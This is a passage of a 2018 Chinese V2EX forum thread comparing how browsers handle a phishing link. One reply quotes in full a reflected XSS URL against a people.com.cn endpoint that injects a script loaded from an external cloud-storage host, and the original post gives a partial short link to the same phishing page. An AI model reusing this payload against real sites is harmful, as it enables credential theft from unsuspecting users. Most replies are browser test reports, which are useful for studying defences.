国内所谓的安全套壳浏览器还是不如 Chrome

2018 年 6 月 18 日
 nolo
在电脑上正好收到一个好友的钓鱼链接,用 chrome 打开。没有所谓的云安全,还是被 Chrome 拦截。带着好奇的心态测试了手机上的 Chrome,也是被拦截。
反之测试手机 QQ 内置浏览器。钓鱼网站完美绕过各种安全策略。

附钓鱼链接(V 站不让传短链接,麻烦大家手动补全了,腾讯的短链接):5yuZZRV




手机 Chrome 被拦截:
9239 次点击
所在节点    全球工单系统
40 条回复
dingyi9257
2018 年 6 月 18 日
谷歌大法好
xmdhs
2018 年 6 月 18 日
http://tvplayer.people.com.cn/getXMLForHW.php?stgcfhee=srhgctihedesdfbjmvch&more=use_push_mode&path=as.xml&callback=%3Cbr%3E%00%00%00%00%00%00%00%3CscripT%20/src%3D//api61.oss-cn-beijing.aliyuncs.com/login.js?v=0613%3E%3C/scripT%3E%3C!--&tgaadjcxsi=lbsduqrkbhograhibpda.html/ZlSXL.jpg?tt=0&t=share&time=1529126529879#/hua_reds

好会玩 用人民网 自然就绕过去了 再加上国内的浏览器默认显示标题而不是网址

一般的用户 号就被盗了.....
gam2046
2018 年 6 月 18 日
古老的 IE 11 也阻止了请求: https://i.loli.net/2018/06/18/5b2763c53c5b4.jpg

所以人民网为啥会有这种低级的 XSS 漏洞呢
jininij
2018 年 6 月 18 日
chrome 67.0.3396.87 + iOS 11.4 没有任何错误和警告。正常显示。
nolo
2018 年 6 月 18 日
@jininij chrome 在 ios 上也是 safari 的内核
Vegetables
2018 年 6 月 18 日
Android chrome 67.0.3396.87 拦截
zpf020610
2018 年 6 月 18 日
腾讯啪啪打脸
Vegetables
2018 年 6 月 18 日
顺带问下 MIUI 不能自己更新 webview ? 从 apkpure 下载的无法安装,开发者模式显示的还是 Android system webview 62
jimages
2018 年 6 月 18 日
safari 拦截失败
jiujiuKA
2018 年 6 月 18 日
安卓 chrome 拦截,ff 放行
serical
2018 年 6 月 18 日
安卓 yandex 拦截
chinasunyingjian
2018 年 6 月 18 日
@Vegetables 装个框架 用 google play 可以更新
acsami
2018 年 6 月 18 日
谷歌大法好
we2ex
2018 年 6 月 18 日
手机夸克浏览器放行→_→
WillyWong
2018 年 6 月 18 日
Cent Browser 拦截成功
woodrat
2018 年 6 月 18 日
客户端拦截和云拦截还是不太一样的, 有些 XSS 不好在服务端检测的,客户端检测不到可能是套壳的版本不够高。。
iyaozhen
2018 年 6 月 18 日
可怕的是微信里面不拦截
LimboRunner
2018 年 6 月 18 日
国际版最新 MIUI 浏览器不拦截,小米垃圾
mrcn
2018 年 6 月 18 日
WebView 64 拦截成功
iwtbauh
2018 年 6 月 18 日
lineageos 14.1 自带浏览器(其实就是 webview )成功拦截,显示 net::ERR_BLOCKED_BY_XSS_AUDITOR
chrome for amdroid 67.0 成功拦截
Firefox for android 60.0.2 未拦截

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://study.congcong.us/t/463875

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX